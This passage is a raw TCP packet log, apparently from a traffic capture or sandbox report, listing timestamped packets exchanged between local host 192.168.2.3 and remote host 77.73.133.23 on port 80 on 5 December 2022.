Dec 5, 2022 01:32:57.133713007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.133800983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.133816004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.133831978 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.133861065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.133878946 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.133883953 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.133908987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.133948088 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.133991003 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134006977 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134021997 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134035110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.134037018 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134069920 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.134095907 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.134663105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134680033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134694099 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134710073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134725094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134728909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.134741068 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134757042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134772062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.134785891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.134793043 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.135231972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.135263920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.135281086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.135296106 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.135298014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.135315895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.135318041 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.135338068 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.135341883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.135355949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.135365009 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.135375023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.135385990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.135399103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.135416985 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.136317015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.136337042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.136353970 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.136364937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.136373043 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.136384964 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.136390924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.136409044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.136426926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.136435032 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.136445045 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.136451960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.136467934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.136492014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137382984 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137403011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137418985 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137437105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137450933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137454033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137469053 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137474060 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137492895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137502909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137511015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137521029 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137551069 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137876034 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137895107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137911081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137928009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137943983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137945890 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137964964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.137964964 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137981892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.137984037 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.138003111 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.138017893 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.138034105 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.138042927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.138873100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.138916969 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.138933897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.138950109 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.138967991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.138974905 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.138986111 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.139014959 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.139034033 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.139405012 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.139424086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.139455080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.139489889 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.139595985 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.139614105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.139657974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.139935970 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.139997005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.140006065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.140016079 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.140033960 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.140050888 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.140063047 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.140069008 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.140084028 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.140089989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.140109062 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.140135050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.140157938 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.140978098 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.140995979 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.141014099 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.141026020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.141036034 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.141045094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.141064882 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.141074896 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.141086102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.141102076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.141104937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.141124010 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.141125917 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.141149998 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.141170979 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142047882 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142067909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142085075 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142102003 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142108917 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142121077 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142133951 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142141104 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142159939 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142168999 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142178059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142189026 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142195940 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142211914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142246962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142256975 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142636061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142654896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142692089 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142710924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142781973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142801046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142817974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142836094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142852068 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142853022 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142872095 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142890930 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142899990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.142904997 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142930031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.142945051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.143640995 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.143667936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.143685102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.143695116 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.143702984 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.143722057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.143726110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.143739939 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.143758059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.143758059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.143785954 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.143810034 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.144098043 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144117117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144162893 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.144646883 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144665956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144682884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144704103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.144706964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144726038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144743919 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144747019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.144762993 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.144778967 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.144795895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145157099 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145193100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145229101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145263910 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145282030 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145288944 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145309925 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145329952 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145349979 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145370007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145384073 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145390987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145414114 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145415068 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145428896 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145435095 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145454884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145462036 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145477057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145476103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145493031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145498991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145519018 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.145520926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.145555019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146617889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146639109 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146660089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146680117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146699905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146703959 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146722078 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146728992 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146743059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146750927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146765947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146773100 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146787882 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146790981 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146806002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146809101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146826029 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146861076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146939993 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.146987915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.146991968 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147012949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147030115 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147032976 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147054911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147062063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147088051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147100925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147356033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147377014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147397995 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147418022 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147422075 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147439003 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147450924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147459984 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147480965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147485971 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147501945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147511005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147524118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147532940 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147546053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147552013 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147567987 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147568941 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.147587061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.147610903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151473045 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151494980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151515961 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151536942 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151555061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151556015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151577950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151595116 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151597977 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151617050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151619911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151640892 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151642084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151660919 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151669979 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151680946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151684046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151705027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151705027 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151722908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151725054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.151746988 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.151768923 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.399689913 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.399781942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.756233931 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.757684946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779246092 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779309988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779355049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779361010 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779391050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779397011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779407024 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779439926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779452085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779480934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779520988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779560089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779568911 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779568911 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779602051 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779644966 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779652119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779652119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779684067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779725075 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779730082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779730082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779766083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779797077 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779805899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779838085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779851913 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779863119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779891968 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779923916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779933929 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779977083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.779978991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.779978991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780015945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780021906 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780057907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780075073 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780097961 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780134916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780134916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780138016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780179024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780217886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780258894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780299902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780308962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780308962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780340910 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780380964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780386925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780386925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780421972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780453920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.780472994 CET	49707	80	192.168.2.3	77.73.133.23
